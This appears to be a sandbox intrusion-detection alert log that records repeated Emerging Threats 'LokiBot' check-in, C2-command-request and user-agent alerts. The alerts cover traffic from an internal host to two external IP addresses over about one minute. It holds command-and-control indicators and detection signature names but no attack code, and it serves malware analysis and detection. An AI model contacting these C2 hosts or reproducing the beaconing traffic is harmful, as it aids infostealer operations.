                                    07/21/21-17:02:13.720336TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3172.67.155.45
                                    07/21/21-17:02:14.234800TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3172.67.155.45
                                    07/21/21-17:02:14.234800TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3172.67.155.45
                                    07/21/21-17:02:14.234800TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3172.67.155.45
                                    07/21/21-17:02:14.826379TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.3104.21.6.222
                                    07/21/21-17:02:14.826379TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.3104.21.6.222
                                    07/21/21-17:02:14.826379TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.3104.21.6.222
                                    07/21/21-17:02:15.344615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.3104.21.6.222
                                    07/21/21-17:02:15.344615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.3104.21.6.222
                                    07/21/21-17:02:15.344615TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.3104.21.6.222
                                    07/21/21-17:02:15.887512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.3172.67.155.45
                                    07/21/21-17:02:15.887512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.3172.67.155.45
                                    07/21/21-17:02:15.887512TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.407556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.407556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.407556TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.967063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.967063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.3172.67.155.45
                                    07/21/21-17:02:16.967063TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.3172.67.155.45
                                    07/21/21-17:02:17.585324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.3104.21.6.222
                                    07/21/21-17:02:17.585324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.3104.21.6.222
                                    07/21/21-17:02:17.585324TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.3104.21.6.222
                                    07/21/21-17:02:18.113141TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.3172.67.155.45
                                    07/21/21-17:02:18.113141TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.3172.67.155.45
                                    07/21/21-17:02:18.113141TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.3172.67.155.45
                                    07/21/21-17:02:18.699980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3172.67.155.45
                                    07/21/21-17:02:18.699980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3172.67.155.45
                                    07/21/21-17:02:18.699980TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3172.67.155.45
                                    07/21/21-17:02:19.212324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.3104.21.6.222
                                    07/21/21-17:02:19.212324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.3104.21.6.222
                                    07/21/21-17:02:19.212324TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.3104.21.6.222
                                    07/21/21-17:02:19.722257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3104.21.6.222
                                    07/21/21-17:02:19.722257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3104.21.6.222
                                    07/21/21-17:02:19.722257TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3104.21.6.222
                                    07/21/21-17:02:20.870407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3172.67.155.45
                                    07/21/21-17:02:20.870407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3172.67.155.45
                                    07/21/21-17:02:20.870407TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3172.67.155.45
                                    07/21/21-17:02:21.693625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.3104.21.6.222
                                    07/21/21-17:02:21.693625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.3104.21.6.222
                                    07/21/21-17:02:21.693625TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.3104.21.6.222
                                    07/21/21-17:02:22.326074TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.3104.21.6.222
                                    07/21/21-17:02:22.326074TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.3104.21.6.222
                                    07/21/21-17:02:22.326074TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3104.21.6.222
                                    07/21/21-17:02:22.876754TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:22.876754TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:22.876754TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.408568TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3172.67.155.45
                                    07/21/21-17:02:23.925389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:23.925389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:23.925389TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:24.558291TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.091660TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.3104.21.6.222
                                    07/21/21-17:02:25.575841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:25.575841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:25.575841TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.075061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.3104.21.6.222
                                    07/21/21-17:02:26.075061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.3104.21.6.222
                                    07/21/21-17:02:26.075061TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.3104.21.6.222
                                    07/21/21-17:02:26.650096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.650096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:26.650096TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.149859TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.3172.67.155.45
                                    07/21/21-17:02:27.624312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:27.624312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:27.624312TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.139416TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3104.21.6.222
                                    07/21/21-17:02:28.618676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:28.618676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:28.618676TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.123700TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:29.594771TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.220814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.220814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.220814TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3104.21.6.222
                                    07/21/21-17:02:30.746183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.746183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:30.746183TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.359135TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3172.67.155.45
                                    07/21/21-17:02:31.944171TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:31.944171TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:31.944171TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.425812TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.21.6.222
                                    07/21/21-17:02:32.886717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:32.886717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:32.886717TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.415034TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:33.875913TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.390111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.390111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.390111TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3104.21.6.222
                                    07/21/21-17:02:34.914148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.914148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:34.914148TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3172.67.155.45
                                    07/21/21-17:02:35.455161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.455161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.455161TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:35.957509TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3104.21.6.222
                                    07/21/21-17:02:36.779629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:36.779629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:36.779629TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3172.67.155.45
                                    07/21/21-17:02:37.265545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.265545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.265545TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:37.872285TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.354510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.354510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.354510TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3172.67.155.45
                                    07/21/21-17:02:38.846387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.846387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:38.846387TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.462964TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:39.966712TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.433906TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:40.967167TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3104.21.6.222
                                    07/21/21-17:02:41.554207TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:41.554207TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:41.554207TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.3172.67.155.45
                                    07/21/21-17:02:42.040061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.040061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.040061TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:42.533368TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3104.21.6.222
                                    07/21/21-17:02:43.028631TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.028631TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.028631TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:43.538465TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.281989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.281989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.281989TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3104.21.6.222
                                    07/21/21-17:02:44.910721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.910721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:44.910721TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:45.875521TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.3172.67.155.45
                                    07/21/21-17:02:47.515414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:47.515414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:47.515414TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.052467TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.3104.21.6.222
                                    07/21/21-17:02:48.613532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:48.613532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:48.613532TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.200374TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3172.67.155.45
                                    07/21/21-17:02:49.807202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:49.807202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:49.807202TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3104.21.6.222
                                    07/21/21-17:02:50.493603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:50.493603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:50.493603TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.150121TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.3172.67.155.45
                                    07/21/21-17:02:51.615075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:51.615075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:51.615075TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.3104.21.6.222
                                    07/21/21-17:02:52.226164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:52.226164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:52.226164TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.3172.67.155.45
                                    07/21/21-17:02:53.008341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.008341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.008341TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:53.500319TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.057067TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.057067TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.057067TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3172.67.155.45
                                    07/21/21-17:02:54.588301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.588301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:54.588301TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.084564TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.084564TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.084564TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3172.67.155.45
                                    07/21/21-17:02:55.635202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.635202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:55.635202TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.175478TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:56.689731TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.212747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.212747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.212747TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3172.67.155.45
                                    07/21/21-17:02:57.699677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.699677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:57.699677TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.192042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.192042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.192042TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3172.67.155.45
                                    07/21/21-17:02:58.763149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.763149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3104.21.6.222
                                    07/21/21-17:02:58.763149TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3104.21.6.222
